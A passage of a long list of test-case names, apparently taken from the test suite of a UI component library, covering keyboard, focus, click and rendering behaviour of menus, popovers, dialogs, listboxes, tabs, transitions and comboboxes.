the next item when pressing the ArrowDown key", "should select the current option when pressing space", "should select the current option only once when pressing space", "should submit the form on `Enter`", "should submit the form on `Enter` (when no submit button was found)", "should be possible to change the current radio group value when clicking on a radio option", "should be a no-op when clicking on the same item", "should be possible to set the `form`, which is forwarded to the hidden inputs", "should be possible to submit a form with a value", "should be possible to submit a form with a complex value object", "should be possible to render a Switch without crashing", "should be possible to render an (on) Switch using a render prop", "should be possible to render an (off) Switch using a render prop", "should be possible to render an (on) Switch using an `as` prop", "should be possible to render an (off) Switch using an `as` prop", "should be possible to use the switch contents as the label", "should be possible to use in an uncontrolled way with a value", "should be possible to render a Switch.Group, Switch and Switch.Label", "should be possible to render a Switch.Group, Switch and Switch.Label (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Label (after the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (before the Switch)", "should be possible to render a Switch.Group, Switch and Switch.Description (after the Switch)", "should be possible to render a Switch.Group, Switch, Switch.Label and Switch.Description", "should be possible to toggle the Switch with Space", "should not be possible to use Enter to toggle the Switch", "should be possible to tab away from the Switch", "should be possible to toggle the Switch with a click", "should be possible to toggle the Switch with a click on the Label", "should not be possible to toggle the Switch with a click on the Label (passive)", "should be possible to submit a form with an boolean value", "should be possible to submit a form with a provided string value", "should be possible to render a SwitchGroup, Switch and SwitchLabel", "should be possible to render a SwitchGroup, Switch and SwitchLabel (before the Switch)", "should be possible to render a SwitchGroup, Switch and SwitchLabel (after the Switch)", "should be possible to put classes on a SwitchLabel", "should be possible to put classes on a SwitchDescription", "should be possible to put classes on a SwitchGroup", "should error when we are using a <RadioGroup.Option /> without a parent <RadioGroup />", "should expose internal data as a render prop", "should error when we are using a <MenuButton /> without a parent <Menu />", "should error when we are using a <MenuItems /> without a parent <Menu />", "should error when we are using a <MenuItem /> without a parent <Menu />", "should be possible to render a Menu without crashing", "should not crash when rendering no children at all", "should be possible to render a Menu using a default render prop", "should be possible to render a Menu using a template `as` prop", "should yell when we render a Menu using a template `as` prop (default) that contains multiple children (if we passthrough props)", "should be possible to manually close the Menu using the exposed close function", "should be possible to render a MenuButton using a default render prop", "should be possible to render a MenuButton using a template `as` prop", "should be possible to render a MenuButton using a template `as` prop and a custom element", "should yell when we render a MenuButton using a template `as` prop that contains multiple children", "should be possible to render MenuItems using a default render prop", "should be possible to render MenuItems using a template `as` prop", "should yell when we render MenuItems using a template `as` prop that contains multiple children", "should be possible to always render the MenuItems if we provide it a `static` prop", "should be possible to use a different render strategy for the MenuItems", "should be possible to render MenuItem using a default render prop", "should be possible to render a MenuItem using a template `as` prop", "should yell when we render a MenuItem using a template `as` prop that contains multiple children", "should be possible to swap the menu item with a button for example", "should mark all the elements between Menu.Items and Menu.Item with role none", "should always open the MenuItems because of a wrapping OpenClosed component", "should always close the MenuItems because of a wrapping OpenClosed component", "should be possible to render a TransitionChild that inherits state from the Menu", "should be possible to use a button as a menu item and invoke it upon Enter", "should be possible to open the menu with Enter", "should not be possible to open the menu with Enter when the button is disabled", "should have no active menu item when there are no menu items at all", "should focus the first non disabled menu item when opening with Enter", "should focus the first non disabled menu item when opening with Enter (jump over multiple disabled ones)", "should have no active menu item upon Enter key press, when there are no non-disabled menu items", "should be possible to close the menu with Enter when there is no active menuitem", "should be possible to close the menu with Enter and invoke the active menu item", "should be possible to open the menu with Space", "should not be possible to open the menu with Space when the button is disabled", "should focus the first non disabled menu item when opening with Space", "should focus the first non disabled menu item when opening with Space (jump over multiple disabled ones)", "should have no active menu item upon Space key press, when there are no non-disabled menu items", "should be possible to close the menu with Space when there is no active menuitem", "should be possible to close the menu with Space and invoke the active menu item", "should be possible to close an open menu with Escape", "should not focus trap when we use Tab", "should not focus trap when we use Shift+Tab", "should be possible to open the menu with ArrowDown", "should not be possible to open the menu with ArrowDown when the button is disabled", "should be possible to use ArrowDown to navigate the menu items", "should be possible to use ArrowDown to navigate the menu items and skip the first disabled one", "should be possible to use ArrowDown to navigate the menu items and jump to the first non-disabled one", "should be possible to open the menu with ArrowUp and the last item should be active", "should be possible to use ArrowUp to navigate the menu items and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled item", "should be possible to use ArrowUp to navigate the menu items", "should be possible to use the End key to go to the last menu item", "should be possible to use the End key to go to the last non disabled menu item", "should be possible to use the End key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon End key press, when there are no non-disabled menu items", "should be possible to use the PageDown key to go to the last menu item", "should be possible to use the PageDown key to go to the last non disabled menu item", "should be possible to use the PageDown key to go to the first menu item if that is the only non-disabled menu item", "should have no active menu item upon PageDown key press, when there are no non-disabled menu items", "should be possible to use the Home key to go to the first menu item", "should be possible to use the Home key to go to the first non disabled menu item", "should be possible to use the Home key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon Home key press, when there are no non-disabled menu items", "should be possible to use the PageUp key to go to the first menu item", "should be possible to use the PageUp key to go to the first non disabled menu item", "should be possible to use the PageUp key to go to the last menu item if that is the only non-disabled menu item", "should have no active menu item upon PageUp key press, when there are no non-disabled menu items", "should be possible to type a full word that has a perfect match", "should be possible to type a partial of a word", "should be possible to type words with spaces", "should not be possible to search for a disabled item", "should be possible to search for a word (case insensitive)", "should be possible to search for the next occurence", "should stay on the same item while keystrokes still match", "should be possible to open a menu on click", "should not be possible to open a menu on right click", "should not be possible to open a menu on click when the button is disabled", "should be possible to close a menu on click", "should be a no-op when we click outside of a closed menu", "should be possible to click outside of the menu which should close the menu", "should be possible to click outside of the menu which should close the menu (even if we press the menu button)", "should be possible to click outside of the menu on another menu button which should close the current menu and open the new menu", "should be possible to hover an item and make it active", "should make a menu item active when you move the mouse over it", "should be a no-op when we move the mouse and the menu item is already active", "should be a no-op when we move the mouse and the menu item is disabled", "should not be possible to hover an item that is disabled", "should be possible to mouse leave an item and make it inactive", "should be possible to mouse leave a disabled item and be a no-op", "should be possible to click a menu item, which closes the menu", "should be possible to click a menu item, which closes the menu and invokes the @click handler", "should be possible to click a disabled menu item, which is a no-op", "should be possible focus a menu item, so that it becomes active", "should not be possible to focus a menu item which is disabled", "should not be possible to activate a disabled item", "should error when we are using a <PopoverButton /> without a parent <Popover />", "should error when we are using a <PopoverPanel /> without a parent <Popover />", "should error when we are using a <PopoverOverlay /> without a parent <Popover />", "should be possible to render a Popover without crashing", "should be possible to render a PopoverGroup with multiple Popover components", "should be possible to render a Popover using a render prop", "should expose a close function that closes the popover", "should expose a close function that closes the popover and restores to a specific element", "should expose a close function that closes the popover and restores to a ref", "should be possible to render a PopoverButton using a render prop", "should be possible to render a PopoverButton using a render prop and an `as` prop", "should be possible to render PopoverPanel using a render prop", "should be possible to always render the PopoverPanel if we provide it a `static` prop", "should be possible to use a different render strategy for the PopoverPanel", "should be possible to move the focus inside the panel to the first focusable element (very first link)", "should close the Popover, when PopoverPanel has the focus prop and you focus the open button", "should be possible to move the focus inside the panel to the first focusable element (skip hidden link)", "should be possible to move the focus inside the panel to the first focusable element (very first link) when the hidden render strategy is used", "should always open the PopoverPanel because of a wrapping OpenClosed component", "should always close the PopoverPanel because of a wrapping OpenClosed component", "should be possible to open the Popover with Enter", "should not be possible to open the popover with Enter when the button is disabled", "should be possible to close the popover with Enter when the popover is open", "should close other popover menus when we open a new one", "should close the Popover by pressing `Enter` on a PopoverButton inside a PopoverPanel", "should close the Popover menu, when pressing escape on the PopoverButton", "should close the Popover menu, when pressing escape on the PopoverPanel", "should be possible to close a sibling Popover when pressing escape on a sibling PopoverButton", "should be possible to Tab through the panel contents onto the next PopoverButton", "should be possible to place a focusable item in the PopoverGroup, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the PopoverGroup", "should close the Popover menu once we Tab out of the Popover", "should close the Popover menu once we Tab out of a Popover without focusable elements", "should close the Popover when the PopoverPanel has a focus prop", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal)", "should close the Popover when the PopoverPanel has a focus prop (PopoverPanel uses a Portal), and focus the next focusable item in line", "should focus the previous PopoverButton when Shift+Tab on the second PopoverButton", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel", "should focus the PopoverButton when pressing Shift+Tab when we focus inside the PopoverPanel (inside a Portal)", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (heuristc based portal)", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton", "should be possible to focus the last item in the PopoverPanel when pressing Shift+Tab on the next PopoverButton (using Portal's)", "should be possible to open the popover with Space", "should not be possible to open the popover with Space when the button is disabled", "should be possible to close the popover with Space when the popover is open", "should close the Popover by pressing `Space` on a PopoverButton inside a PopoverPanel", "should close the Popover by pressing `Enter` on a PopoverButton and go to the href of the `a` inside a PopoverPanel", "should be possible to open a popover on click", "should not be possible to open a popover on right click", "should not be possible to open a popover on click when the button is disabled", "should be possible to close a popover on click", "should be possible to close a Popover using a click on the PopoverOverlay", "should be possible to close the popover, and re-focus the button when we click outside on the body element", "should be possible to close the popover, and re-focus the button when we click outside on a non-focusable element", "should be possible to close the popover, by clicking outside the popover on another focusable element", "should be possible to close the popover, by clicking outside the popover on another element inside a focusable element", "should be possible to close the Popover by clicking on a PopoverButton inside a PopoverPanel", "should not close the Popover when clicking on a focusable element inside a static PopoverPanel", "should not close the Popover when clicking on a non-focusable element inside a static PopoverPanel", "should close the Popover when clicking outside of a static PopoverPanel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel", "should be possible to close the Popover by clicking on the Popover.Button outside the Popover.Panel (when using the `focus` prop)", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using Portals", "should not close the Popover if the focus is moved outside of the Popover but still in the same React tree using nested Portals", "should be possible to nest Popover components and control them individually", "should error when we are using a <DialogOverlay /> without a parent <Dialog />", "should error when we are using a <DialogTitle /> without a parent <Dialog />", "should error when we are using a <DialogBackdrop /> without a parent <Dialog />", "should error when we are using a <DialogPanel /> without a parent <Dialog />", "should be possible to render a Dialog without crashing", "should be possible to access the ref on the DialogBackdrop", "should be possible to access the ref on the DialogPanel", "should complain when an `open` prop is missing", "should be able to explicitly choose role=dialog", "should be able to explicitly choose role=alertdialog", "should fall back to role=dialog for an invalid role", "should complain when an `open` prop is not a boolean", "should be possible to render a Dialog using a render prop", "should be possible to pass props to the Dialog itself", "should be possible to always render the Dialog if we provide it a `static` prop (and enable focus trapping based on `open`)", "should be possible to always render the Dialog if we provide it a `static` prop (and disable focus trapping based on `open`)", "should be possible to use a different render strategy for the Dialog", "should add a scroll lock to the html tag", "should wait to add a scroll lock to the html tag when unmount is false in a Transition", "scroll locking should work when transitioning between dialogs", "should remove the scroll lock when the open closed state is `Closing`", "should not have a scroll lock when the transition marked as not shown", "should be possible to render DialogOverlay using a render prop", "should throw an error if a DialogBackdrop is used without a DialogPanel", "should not throw an error if a DialogBackdrop is used with a DialogPanel", "should portal the DialogBackdrop", "should be possible to render DialogTitle using a render prop", "should be possible to render DialogDescription using a render prop", "should be possible to open a dialog from inside a Popover (and then close it)", "should be possible to open the Dialog via a Transition component", "should be possible to close the Dialog via a Transition component", "should be possible to close the dialog with Escape", "should be possible to close the dialog with Escape, when a field is focused", "should not be possible to close the dialog with Escape, when a field is focused but cancels the event", "should be possible to tab around when using the initialFocus ref", "should be possible to tab around when using the initialFocus ref on a component", "should not escape the FocusTrap when there is only 1 focusable element (going forwards)", "should not escape the FocusTrap when there is only 1 focusable element (going backwards)", "should be possible to close a Dialog using a click on the DialogOverlay", "should not close the Dialog when clicking on contents of the Dialog.Overlay", "should be possible to close the dialog, and re-focus the button when we click outside on the body element", "should be possible to close the dialog, and keep focus on the focusable element", "should stop propagating click events when clicking on the Dialog.Overlay", "should be possible to submit a form inside a Dialog", "should stop propagating click events when clicking on an element inside the Dialog", "should should be possible to click on removed elements without closing the Dialog", "should be possible to click on elements created by third party libraries", "should be possible to focus elements created by third party libraries", "should be possible to click elements inside the dialog when they reside inside a shadow boundary", "should close the Dialog if we click outside the DialogPanel", "should not close the Dialog if we click inside the DialogPanel", "should not close the dialog if opened during mouse up", "should not close the dialog if click starts inside the dialog but ends outside", "should be possible to open nested Dialog components and close them with `Escape`", "should be possible to open nested Dialog components and close them with `Outside Click`", "should be possible to open nested Dialog components and close them with `Click on Dialog.Overlay`", "should error when we are using a <Menu.Button /> without a parent <Menu />", "should error when we are using a <Menu.Items /> without a parent <Menu />", "should error when we are using a <Menu.Item /> without a parent <Menu />", "should be possible to render a Menu using a render prop", "should be possible to render a Menu.Button using a render prop", "should be possible to render a Menu.Button using a render prop and an `as` prop", "should be possible to render Menu.Items using a render prop", "should be possible to always render the Menu.Items if we provide it a `static` prop", "should be possible to use a different render strategy for the Menu.Items", "should be possible to render a Menu.Item using a render prop", "should be possible to conditionally render classNames (aka className can be a function?!)", "should be possible to wrap the Menu.Items with a Transition component", "should be possible to wrap the Menu.Items with a Transition.Child component", "should close when we use Tab", "should focus trap when we use Shift+Tab", "should not be possible to open the menu with ArrowUp and the last item should be active when the button is disabled", "should be possible to click outside of the menu, on an element which is within a focusable element, which closes the menu", "should error when we are using a <Popover.Button /> without a parent <Popover />", "should error when we are using a <Popover.Panel /> without a parent <Popover />", "should error when we are using a <Popover.Overlay /> without a parent <Popover />", "should be possible to render a Popover.Group with multiple Popover components", "should expose a close function that closes the popover and takes an event", "should be possible to get a ref to the Popover", "should be possible to use a Fragment with an optional ref", "should be possible to render a Popover.Button using a fragment", "should be possible to render a Popover.Button using a render prop", "should be possible to render a Popover.Button using a render prop and an `as` prop", "should be possible to render Popover.Panel using a render prop", "should be possible to always render the Popover.Panel if we provide it a `static` prop", "should be possible to use a different render strategy for the Popover.Panel", "should close the Popover, when Popover.Panel has the focus prop and you focus the open button", "should warn when you are using multiple `Popover.Button` components", "should warn when you are using multiple `Popover.Button` components (wrapped in a Transition)", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel`", "should not warn when you are using multiple `Popover.Button` components inside the `Popover.Panel` (wrapped in a Transition)", "should warn when you are using multiple `Popover.Button` components in a nested `Popover`", "should not warn when you are using multiple `Popover.Button` components in a nested `Popover.Panel`", "should be possible to wrap the Popover.Panel with a Transition component", "should close the Popover by pressing `Enter` on a Popover.Button inside a Popover.Panel", "should close the Popover menu, when pressing escape on the Popover.Button", "should close the Popover menu, when pressing escape on the Popover.Panel", "should be possible to close a sibling Popover when pressing escape on a sibling Popover.Button", "should be possible to Tab through the panel contents onto the next Popover.Button", "should be possible to place a focusable item in the Popover.Group, and keep the Popover open when we focus the focusable element", "should close the Popover menu once we Tab out of the Popover.Group", "should close the Popover when the Popover.Panel has a focus prop", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal)", "should close the Popover when the Popover.Panel has a focus prop (Popover.Panel uses a Portal), and focus the next focusable item in line", "should focus the previous Popover.Button when Shift+Tab on the second Popover.Button", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel", "should focus the Popover.Button when pressing Shift+Tab when we focus inside the Popover.Panel (inside a Portal)", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button", "should be possible to focus the last item in the Popover.Panel when pressing Shift+Tab on the next Popover.Button (using Portal's)", "should close the Popover by pressing `Space` on a Popover.Button inside a Popover.Panel", "should close the Popover by pressing `Enter` on a Popover.Button and go to the href of the `a` inside a Popover.Panel", "should be possible to close a Popover using a click on the Popover.Overlay", "should be possible to close the Popover by clicking on a Popover.Button inside a Popover.Panel", "should not close the Popover when clicking on a focusable element inside a static Popover.Panel", "should not close the Popover when clicking on a non-focusable element inside a static Popover.Panel", "should close the Popover when clicking outside of a static Popover.Panel", "should error when we are using a <ListboxButton /> without a parent <Listbox />", "should error when we are using a <ListboxLabel /> without a parent <Listbox />", "should error when we are using a <ListboxOptions /> without a parent <Listbox />", "should error when we are using a <ListboxOption /> without a parent <Listbox />", "should be possible to render a Listbox without crashing", "should be possible to render a Listbox using a render prop", "should be possible to disable a Listbox", "should not crash in multiple mode", "null should be a valid value for the Listbox", "should be possible to use the by prop (as a string) with a null initial value", "should be possible to use the by prop (as a string) with a null listbox option", "should be possible to use completely new objects while rendering (single mode)", "should be possible to use completely new objects while rendering (multiple mode)", "should be possible to render a ListboxLabel using a render prop", "should be possible to render a ListboxLabel using a render prop and an `as` prop", "should be possible to render a ListboxButton using a render prop", "should be possible to render a ListboxButton using a render prop and an `as` prop", "should be possible to render a ListboxButton and a ListboxLabel and see them linked together", "should be possible to render ListboxOptions using a render prop", "should be possible to always render the ListboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ListboxOptions", "should be possible to render a ListboxOption using a render prop", "should expose the value via the render prop", "should be possible to reset to the default value in multiple mode", "should be possible to swap the Listbox option with a button for example", "should always open the ListboxOptions because of a wrapping OpenClosed component", "should always close the ListboxOptions because of a wrapping OpenClosed component", "should be possible to open the listbox with Enter", "should not be possible to open the listbox with Enter when the button is disabled", "should be possible to open the listbox with Enter, and focus the selected option", "should be possible to open the listbox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the listbox with Enter, and focus the selected option (with a list of objects)", "should have no active listbox option when there are no listbox options at all", "should focus the first non disabled listbox option when opening with Enter", "should focus the first non disabled listbox option when opening with Enter (jump over multiple disabled ones)", "should have no active listbox option upon Enter key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Enter when there is no active listboxoption", "should be possible to close the listbox with Enter and choose the active listbox option", "should be possible to open the listbox with Space", "should not be possible to open the listbox with Space when the button is disabled", "should be possible to open the listbox with Space, and focus the selected option", "should focus the first non disabled listbox option when opening with Space", "should focus the first non disabled listbox option when opening with Space (jump over multiple disabled ones)", "should have no active listbox option upon Space key press, when there are no non-disabled listbox options", "should be possible to close the listbox with Space and choose the active listbox option", "should be possible to close an open listbox with Escape", "should focus trap when we use Tab", "should be possible to open the listbox with ArrowDown", "should not be possible to open the listbox with ArrowDown when the button is disabled", "should be possible to open the listbox with ArrowDown, and focus the selected option", "should be possible to use ArrowDown to navigate the listbox options", "should be possible to use ArrowDown to navigate the listbox options and skip the first disabled one", "should be possible to use ArrowDown to navigate the listbox options and jump to the first non-disabled one", "should be possible to use ArrowRight to navigate the listbox options", "should be possible to open the listbox with ArrowUp and the last option should be active", "should not be possible to open the listbox with ArrowUp and the last option should be active when the button is disabled", "should be possible to open the listbox with ArrowUp, and focus the selected option", "should be possible to use ArrowUp to navigate the listbox options and jump to the first non-disabled one", "should not be possible to navigate up or down if there is only a single non-disabled option", "should be possible to use ArrowUp to navigate the listbox options", "should be possible to use ArrowLeft to navigate the listbox options", "should be possible to use the End key to go to the last listbox option", "should be possible to use the End key to go to the last non disabled listbox option", "should be possible to use the End key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon End key press, when there are no non-disabled listbox options", "should be possible to use the PageDown key to go to the last listbox option", "should be possible to use the PageDown key to go to the last non disabled listbox option", "should be possible to use the PageDown key to go to the first listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageDown key press, when there are no non-disabled listbox options", "should be possible to use the Home key to go to the first listbox option", "should be possible to use the Home key to go to the first non disabled listbox option", "should be possible to use the Home key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon Home key press, when there are no non-disabled listbox options", "should be possible to use the PageUp key to go to the first listbox option", "should be possible to use the PageUp key to go to the first non disabled listbox option", "should be possible to use the PageUp key to go to the last listbox option if that is the only non-disabled listbox option", "should have no active listbox option upon PageUp key press, when there are no non-disabled listbox options", "should not be possible to search for a disabled option", "should focus the ListboxButton when we click the ListboxLabel", "should not focus the ListboxButton when we right click the ListboxLabel", "should be possible to open the listbox on click", "should not be possible to open the listbox on right click", "should not be possible to open the listbox on click when the button is disabled", "should be possible to open the listbox on click, and focus the selected option", "should be possible to close a listbox on click", "should be a no-op when we click outside of a closed listbox", "should be possible to click outside of the listbox which should close the listbox", "should be possible to click outside of the listbox on another listbox button which should close the current listbox and open the new listbox", "should be possible to click outside of the listbox which should close the listbox (even if we press the listbox button)", "should be possible to hover an option and make it active", "should make a listbox option active when you move the mouse over it", "should be a no-op when we move the mouse and the listbox option is already active", "should be a no-op when we move the mouse and the listbox option is disabled", "should not be possible to hover an option that is disabled", "should be possible to mouse leave an option and make it inactive", "should be possible to mouse leave a disabled option and be a no-op", "should be possible to click a listbox option, which closes the listbox", "should be possible to click a disabled listbox option, which is a no-op", "should be possible focus a listbox option, so that it becomes active", "should not be possible to focus a listbox option which is disabled", "should be possible to pass multiple values to the Listbox component", "should make the first selected option the active item", "should keep the listbox open when selecting an item via the keyboard", "should toggle the selected state of an option when clicking on it", "should toggle the selected state of an option when clicking on it (using objects instead of primitives)", "should error when we are using a <Dialog.Overlay /> without a parent <Dialog />", "should error when we are using a <Dialog.Title /> without a parent <Dialog />", "should error when we are using a <Dialog.Backdrop /> without a parent <Dialog />", "should error when we are using a <Dialog.Panel /> without a parent <Dialog />", "should complain when the `open` and `onClose` prop are missing", "should complain when an `open` prop is provided without an `onClose` prop", "should complain when an `onClose` prop is provided without an `open` prop", "should complain when an `onClose` prop is not a function", "should be possible to render Dialog.Overlay using a render prop", "should throw an error if a Dialog.Backdrop is used without a Dialog.Panel", "should not throw an error if a Dialog.Backdrop is used with a Dialog.Panel", "should portal the Dialog.Backdrop", "should be possible to render Dialog.Title using a render prop", "should be possible to render Dialog.Description using a render prop", "should be possible to close a Dialog using a click on the Dialog.Overlay", "should not close the Dialog if it starts open and we click inside the Dialog when it has only a panel", "should close the Dialog if we click outside the Dialog.Panel", "should not close the Dialog if we click inside the Dialog.Panel", "should be possible to open nested Dialog components (visible when mounted) and close them with `Escape`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Outside Click`", "should be possible to open nested Dialog components (visible when mounted) and close them with `Click on Dialog.Overlay`", "should be possible to open nested Dialog components (visible when always) and close them with `Escape`", "should be possible to open nested Dialog components (visible when always) and close them with `Outside Click`", "should trigger the `change` when the tab changes", "should error when we are using a <TabList /> without a parent <TabGroup /> component", "should error when we are using a <Tab /> without a parent <TabGroup /> component", "should error when we are using a <TabPanels /> without a parent <TabGroup /> component", "should error when we are using a <TabPanel /> without a parent <TabGroup /> component", "should be possible to render TabGroup without crashing", "should be possible to render the TabPanels first, then the TabList", "should guarantee the order when injecting new tabs dynamically", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (controlled component)", "should guarantee the order of DOM nodes when reversing the tabs and panels themselves, then performing actions (uncontrolled component)", "should expose the `selectedIndex` on the `Tabs` component", "should expose the `selectedIndex` on the `TabList` component", "should expose the `selectedIndex` on the `TabPanels` component", "should expose the `selected` state on the `TabPanel` components", "should jump to the nearest tab when the defaultIndex is out of bounds (-2)", "should jump to the nearest tab when the defaultIndex is out of bounds (+5)", "should jump to the next available tab when the defaultIndex is a disabled tab", "should jump to the next available tab when the defaultIndex is a disabled tab and wrap around", "should not change the Tab if the defaultIndex changes", "should select first tab if no tabs were provided originally", "should select first tab if no tabs were provided originally (with a defaultIndex of 1)", "should not change the tab in a controlled component if you do not respond to the @change", "should be possible to change active tab controlled and uncontrolled", "should jump to the nearest tab when the selectedIndex is out of bounds (-2)", "should jump to the nearest tab when the selectedIndex is out of bounds (+5)", "should jump to the next available tab when the selectedIndex is a disabled tab", "should jump to the next available tab when the selectedIndex is a disabled tab and wrap around", "should prefer selectedIndex over defaultIndex", "should wrap around when overflowing the index when using a controlled component", "should wrap around when underflowing the index when using a controlled component", "should be possible to tab to the default initial first tab", "should be possible to tab to the default index tab", "should be possible to go to the next item (activation = `auto`)", "should be possible to go to the next item (activation = `manual`)", "should wrap around at the end (activation = `auto`)", "should wrap around at the end (activation = `manual`)", "should not be possible to go right when in vertical mode (activation = `auto`)", "should not be possible to go right when in vertical mode (activation = `manual`)", "should be possible to go to the previous item (activation = `auto`)", "should be possible to go to the previous item (activation = `manual`)", "should wrap around at the beginning (activation = `auto`)", "should wrap around at the beginning (activation = `manual`)", "should not be possible to go left when in vertical mode (activation = `auto`)", "should not be possible to go left when in vertical mode (activation = `manual`)", "should not be possible to go down when in horizontal mode (activation = `auto`)", "should not be possible to go down when in horizontal mode (activation = `manual`)", "should be possible to go to the first focusable item (activation = `auto`)", "should be possible to go to the first focusable item (activation = `manual`)", "should be possible to activate the focused tab", "should be possible to click on a tab to focus it", "should be a no-op when clicking on a disabled tab", "should be possible to go to the next item containing a Dialog component", "should trigger the `onChange` when the tab changes", "should error when we are using a <Tab.List /> without a parent <Tab.Group /> component", "should error when we are using a <Tab /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panels /> without a parent <Tab.Group /> component", "should error when we are using a <Tab.Panel /> without a parent <Tab.Group /> component", "should be possible to render Tab.Group without crashing", "should be possible to render the Tab.Panels first, then the Tab.List", "should be possible to render using as={Fragment}", "should be possible to render using multiple as={Fragment}", "should expose the `selectedIndex` on the `Tab.Group` component", "should expose the `selectedIndex` on the `Tab.List` component", "should expose the `selectedIndex` on the `Tab.Panels` component", "should expose the `selected` state on the `Tab.Panel` components", "should not change the tab in a controlled component if you do not respond to the onChange", "should not steal the ref from the child", "should render without crashing", "should be possible to render a Transition without children", "should yell at us when we forget the required show prop", "should render a div and its children by default", "should passthrough all the props (that we do not use internally)", "should render another component if the `as` prop is used and its children by default", "should passthrough all the props (that we do not use internally) even when using an `as` prop", "should render nothing when the show prop is false", "should be possible to change the underlying DOM tag", "should be possible to use a render prop", "should yell at us when we forget to forward the ref when using a render prop", "should yell at us when we forget to wrap the `<Transition.Child />` in a parent <Transition /> component", "should be possible to render a Transition.Child without children", "should be possible to use a Transition.Root and a Transition.Child", "should be possible to nest transition components", "should be possible to change the underlying DOM tag of the Transition.Child components", "should be possible to change the underlying DOM tag of the Transition component and Transition.Child components", "should be possible to use render props on the Transition.Child components", "should be possible to use render props on the Transition and Transition.Child components", "should yell at us when we forgot to forward the ref on one of the Transition.Child components", "should yell at us when we forgot to forward a ref on the Transition component", "should support new lines in class lists", "should be possible to passthrough the transition classes", "should be possible to passthrough the transition classes and immediately apply the enter transitions when appear is set to true", "should fire events in the correct order", "should fire only one event for a given component change", "should error when we are using a <Listbox.Button /> without a parent <Listbox />", "should error when we are using a <Listbox.Label /> without a parent <Listbox />", "should error when we are using a <Listbox.Options /> without a parent <Listbox />", "should error when we are using a <Listbox.Option /> without a parent <Listbox />", "should be possible to render a Listbox.Label using a render prop", "should be possible to render a Listbox.Label using a render prop and an `as` prop", "should be possible to render a Listbox.Button using a render prop", "should be possible to render a Listbox.Button using a render prop and an `as` prop", "should be possible to render a Listbox.Button and a Listbox.Label and see them linked together", "should be possible to render Listbox.Options using a render prop", "should be possible to always render the Listbox.Options if we provide it a `static` prop", "should be possible to use a different render strategy for the Listbox.Options", "should be possible to render a Listbox.Option using a render prop", "should be possible to wrap the Listbox.Options with a Transition component", "should focus the Listbox.Button when we click the Listbox.Label", "should not focus the Listbox.Button when we right click the Listbox.Label", "should be possible to click outside of the listbox, on an element which is within a focusable element, which closes the listbox", "should yell at us when we forget to wrap the `<TransitionChild />` in a parent <Transition /> component", "should be possible to render a TransitionChild without children", "should be possible to change the underlying DOM tag of the TransitionChild components", "should be possible to change the underlying DOM tag of the Transition component and TransitionChild components", "should be possible to use render props on the TransitionChild components", "should be possible to use render props on the Transition and TransitionChild components", "should yell at us when we forgot to forward the ref on one of the TransitionChild components", "should transition in completely (duration defined in seconds)", "should transition in completely (duration defined in seconds) in (render strategy = hidden)", "should transition in completely", "should transition out completely", "should transition out completely (render strategy = hidden)", "should transition in and out completely", "should transition in and out completely (render strategy = hidden)", "should not unmount the whole tree when some children are still transitioning", "should error when we are using a <ComboboxButton /> without a parent <Combobox />", "should error when we are using a <ComboboxLabel /> without a parent <Combobox />", "should error when we are using a <ComboboxOptions /> without a parent <Combobox />", "should error when we are using a <ComboboxOption /> without a parent <Combobox />", "should be possible to render a Combobox without crashing", "should guarantee the order of options based on `order` when performing actions", "should be possible to render a Combobox using a render prop", "should be possible to disable a Combobox", "should not crash when a defaultValue is not given", "should close the Combobox when the input is blurred", "selecting an option puts the value into Combobox.Input when displayValue is not provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided", "selecting an option puts the display value into Combobox.Input when displayValue is provided (when v-model is undefined)", "conditionally rendering the input should allow changing the display value", "should be possible to override the `type` on the input", "should move the caret to the end of the input when syncing the value", "should be possible to render a ComboboxLabel using a render prop", "should be possible to link Input/Button and Label if Label is rendered last", "should be possible to render a ComboboxLabel using a render prop and an `as` prop", "should be possible to render a ComboboxButton using a render prop", "should be possible to render a ComboboxButton using a render prop and an `as` prop", "should be possible to render a ComboboxButton and a ComboboxLabel and see them linked together", "should be possible to render ComboboxOptions using a render prop", "should be possible to always render the ComboboxOptions if we provide it a `static` prop", "should be possible to use a different render strategy for the ComboboxOptions", "should be possible to render a ComboboxOption using a render prop", "should be possible to swap the Combobox option with a button for example", "should mark all the elements between Combobox.Options and Combobox.Option with role none", "should always open the ComboboxOptions because of a wrapping OpenClosed component", "should always close the ComboboxOptions because of a wrapping OpenClosed component", "should sync the active index properly", "should be possible to open the Combobox with Enter", "should not be possible to open the combobox with Enter when the button is disabled", "should be possible to open the combobox with Enter, and focus the selected option", "should be possible to open the combobox with Enter, and focus the selected option (when using the `hidden` render strategy)", "should be possible to open the combobox with Enter, and focus the selected option (with a list of objects)", "should have no active combobox option when there are no combobox options at all", "should be possible to open the combobox with Space", "should not be possible to open the combobox with Space when the button is disabled", "should be possible to open the combobox with Space, and focus the selected option", "should have no active combobox option upon Space key press, when there are no non-disabled combobox options", "should be possible to close an open combobox with Escape", "should not propagate the Escape event when the combobox is open", "should propagate the Escape event when the combobox is closed", "should be possible to open the combobox with ArrowDown", "should not be possible to open the combobox with ArrowDown when the button is disabled", "should be 